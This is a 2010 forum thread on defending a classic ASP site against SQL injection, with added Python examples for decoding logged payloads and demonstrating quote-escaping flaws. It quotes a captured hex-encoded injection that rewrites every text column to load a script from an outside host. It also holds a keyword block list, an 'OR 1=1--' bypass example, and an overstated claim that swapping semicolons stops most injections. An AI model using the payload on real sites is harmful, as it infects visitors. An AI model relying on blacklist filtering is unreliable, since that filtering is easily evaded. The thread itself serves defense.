SQL injection prevention & asp

hi
I am trying to block from the hackers.
(CAST(0X4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);
Here is my code. How should I modify it to block the CAST statement above?
<%
'Use these Constants to designate the type of Event Log.
const TYP_SUCCESS = 0
const TYP_ERROR = 1
const TYP_WARNING = 2
const TYP_INFORMATION = 4
const TYP_AUDIT_SUCCESS = 8
const TYP_AUDIT_FAILURE = 16

Dim Con

' SQL Injection blocking
' WriteEventLog is defined elsewhere in the site (not shown in this post).

Dim strQuery, strVariable, strValue

strQuery = UCase(Request.QueryString)
' Was Replace(strValue, ...), but strValue has no value yet at this point.
' Note that strQuery is not used anywhere below; the per-variable loops do the checking.
strQuery = Replace(strQuery, "(CAST", "")

For Each strVariable In Request.QueryString
    strValue = UCase(Request.QueryString(strVariable))
    If (InStr(strValue,"EXEC(") > 0 OR _
        InStr(strValue,"CAST(") > 0 OR _
        InStr(strValue,";--") > 0 OR _
        InStr(strValue,"'") > 0) AND _
        strValue <> "Exec" AND _
        strValue <> "CAST" AND _
        strValue <> ";--" AND _
        strValue <> "'" Then

        Response.Write "It appears your request contains illegal values.  Please use your back button to change the data or contact .com"

        WriteEventLog "Illegal internet request detected (" & strValue & " - " & Request.ServerVariables("PATH_INFO") & " - " & Request.ServerVariables("REMOTE_ADDR") & ")", TYP_WARNING

        Response.End
    End If
Next

For Each strVariable In Request.Form
    strValue = UCase(Request.Form(strVariable))
    If (InStr(strValue,"EXEC(") > 0 OR _
        InStr(strValue,"CAST(") > 0 OR _
        InStr(strValue,";--") > 0 OR _
        InStr(strValue,"'") > 0) AND _
        strValue <> "Exec" AND _
        strValue <> "CAST" AND _
        strValue <> ";--" AND _
        strValue <> "'" Then

        Response.Write "It appears your request contains illegal values.  Please use your back button to change the data or contact .com"

        WriteEventLog "Illegal internet request detected (" & strValue & ")", TYP_WARNING

        Response.End
    End If
Next
%>
thank you!
Dec 1 '10 #1
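To see what a request like the one above actually carries, and to find others like it in the web server logs, here is an added Python example (not from the thread or the poster's site). It decodes the hex literal inside any CAST(0x... AS CHAR/NVARCHAR) it finds; the log lines and the short hex payload are constructed stand-ins, and the NVARCHAR (UTF-16LE) branch goes beyond the CHAR form shown in the post.

```python
import re
from urllib.parse import unquote_plus

# Matches the obfuscation in the captured request: a hex literal cast to
# (N)(VAR)CHAR and handed to EXEC. Group 1 is the hex, group 2 is "N" when the
# target type is NCHAR/NVARCHAR (those carry UTF-16LE text rather than one byte
# per character; the poster's capture uses CHAR).
CAST_HEX = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR", re.IGNORECASE)

def decode_hex_casts(text):
    """Return the readable SQL inside every CAST(0x... AS CHAR) found in text."""
    found = []
    for m in CAST_HEX.finditer(text):
        hexdigits, wide = m.group(1), m.group(2)
        if len(hexdigits) % 2:          # dangling nibble from a truncated capture
            hexdigits = hexdigits[:-1]
        raw = bytes.fromhex(hexdigits)
        found.append(raw.decode("utf-16-le" if wide else "latin-1", errors="replace"))
    return found

def scan_log(lines):
    """Return (line number, decoded SQL) for every log line carrying such a payload.
    Query strings in IIS logs are URL-encoded, so decode before matching."""
    hits = []
    for n, line in enumerate(lines, 1):
        for sql in decode_hex_casts(unquote_plus(line)):
            hits.append((n, sql))
    return hits

# Constructed stand-in for the poster's payload: the real capture hex-encodes a
# T-SQL cursor loop of several hundred bytes; this encodes a short harmless
# statement so the example runs offline.
DEMO_SQL = "DECLARE @T varchar(255) SELECT @T='demo'"
DEMO_HEX = DEMO_SQL.encode("latin-1").hex().upper()
DEMO_WIDE_HEX = DEMO_SQL.encode("utf-16-le").hex().upper()

# Constructed IIS-style log lines, trimmed to the fields that matter here.
LOG_LINES = [
    "2010-12-01 10:00:00 GET /page.asp id=12 200",
    "2010-12-01 10:00:05 GET /page.asp id=12;(CAST(0x" + DEMO_HEX
    + "%20AS%20CHAR(4000));EXEC(@S); 200",
    "2010-12-01 10:00:09 GET /page.asp id=(CAST(0x" + DEMO_WIDE_HEX
    + "+AS+NVARCHAR(4000));EXEC(@S); 500",
]

if __name__ == "__main__":
    for n, sql in scan_log(LOG_LINES):
        print(f"line {n}: {sql}")
```

Run it over the real IIS log and the decoded text shows exactly which tables the injected statement touched, which is what you need for cleanup after the fact.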
jhardman
What is an example of a legal post here? What is acceptable?

Jared
Dec 1 '10 #2
Any letters are acceptable except the cast, Exec, Execute statements that hackers use. Our asp site got hacked a few times. I am trying to block sql injection.
Dec 1 '10 #3
jhardman
First notice the use of semi-colons. Every sql injection I've heard of uses either semi-colons or the 'go' keyword. (I've heard rumors of others, but if I knew what they were, I certainly wouldn't post them here) So the first thing I would do is replace all semi-colons with the appropriate html character code.
strValue = replace(strValue, ";", "&semi;")
Notice that this will foil 99% of injections, but will display correctly on the screen for those times that a semi-colon is needed.

Second, I would use the instr() function you use above to test for "cast(" and "exec(" and cause the whole thing to fail. The only difference I would put is not use if ... Or ... or ... Or. It's just very easy to make mistakes in those. There's no problem testing for one at a time, but if you want to be more elegant, make an array of forbidden strings, and loop thru them testing for each one individually. Does this make sense?

Jared
Dec 1 '10 #4
Hi Jared
Thank you for the great explanation.
Dec 1 '10 #5
danp129
The hacker either escaped a user input field that was compared as a string and you didn't escape the single quotes, or they simply passed it in an input field that you compared as a number without ensuring the input was numeric. Other databases have some extra escape characters that will affect string comparisons.


I have not seen a SQL injection attack that worked on Microsoft SQL Server if these simple things were followed:

Strings:
Replace single quotes with two single quotes i.e. Replace(userInput, "'", "''").
Do not truncate user input after single quotes have been replaced. You may end up removing a doubled quote that escaped one before it which now allows the next user input to run as a command if more than one user input is used in the query.

Numbers:
Make sure numbers are numeric using isNumeric or converting it (cLng, cInt, cDbl, etc). This will not allow comments or semi-colons or anything else that is not a numeric value.



There are a lot of examples that explain replacing quotes and making sure numbers are numbers, here's an example of how truncating user input after replacing the quotes can cause an issue:

dim strSql
dim userInputName
dim userInputPass

userInputName = " ''" ' value from Request.Form("username")
userInputPass = "OR 1=1--" ' value from Request.Form("password")

userInputName = replace(userInputName, "'", "''")
userInputPass = replace(userInputPass, "'", "''")

' Note values of vars holding user input are now:
' userInputName = " ''''" (a space and 4 single quotes)
' userInputPass = "OR 1=1--"

userInputName = left(userInputName, 4) ' You likely wouldn't limit to 4 but makes example easier to read
userInputPass = left(userInputPass, 10)

' Note values of vars holding user input are now:
' userInputName = " '''" (a space and 3 single quotes [an odd number of quotes])
' userInputPass = "OR 1=1--" (unchanged, it is shorter than 10 characters)

' Example Query:
strSql = "SELECT * FROM users WHERE" & _
         " username='" & userInputName & "'" & _
         " AND" & _
         " password='" & userInputPass & "'"

' Concatenated string (made multi-line for easier reading):
' SELECT * FROM users WHERE
' username=' '''' AND password='
' OR 1=1--'
'
' (note -- is comment and everything after -- is ignored if it is not quoted)
I would also recommend using parameterized SQL instead of concatenating user input. See the 3rd example here for how to use parameterized SQL without a stored procedure. This is slightly safer in some cases but the best part is it is easier to read and maintain once you get used to it and you will be ready to use stored procedures with little changes if/when the time comes.
Dec 9 '10 #6
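The truncation problem and the two remedies from the post above, replayed against an in-memory SQLite database as an added example in Python (not the poster's ASP; SQLite reads doubled quotes and -- comments the same way SQL Server does, which is all this needs). The users table, the helper names and the login functions are constructed for the example.

```python
import sqlite3

def doubled_then_truncated(value, limit):
    """The order danp129 warns about: double the quotes, then cut the field to
    length, which can strip one quote of a doubled pair and leave an odd count."""
    return value.replace("'", "''")[:limit]

def truncated_then_doubled(value, limit):
    """If you must escape by hand, cut first and double every quote afterwards."""
    return value[:limit].replace("'", "''")

def as_number(value):
    """Mirror of the isNumeric/cLng advice: a numeric field must convert cleanly,
    so input carrying ';', '--' or CAST(...) never reaches the query text."""
    return int(value.strip())       # raises ValueError for anything non-numeric

def make_db():
    """Constructed users table with two sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    return con

def login_concat(con, name, pwd, escape):
    """Query built by concatenation, as in the thread, with the given escaping
    order; the limits 4 and 10 are the thread's left() widths."""
    sql = ("SELECT * FROM users WHERE username='" + escape(name, 4)
           + "' AND password='" + escape(pwd, 10) + "'")
    return con.execute(sql).fetchall()

def login_param(con, name, pwd):
    """Parameterised query: values travel separately and are never parsed as SQL."""
    return con.execute("SELECT * FROM users WHERE username=? AND password=?",
                       (name, pwd)).fetchall()

# The thread's inputs: a name of a space and two quotes, and a password that
# becomes a bare OR clause once the quote pairing is broken.
NAME, PWD = " ''", "OR 1=1--"

if __name__ == "__main__":
    con = make_db()
    print("double then truncate:", login_concat(con, NAME, PWD, doubled_then_truncated))
    print("truncate then double:", login_concat(con, NAME, PWD, truncated_then_doubled))
    print("parameterised:       ", login_param(con, NAME, PWD))
```

The first call returns every row because the odd quote count turns the password into a WHERE clause; the other two return nothing.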
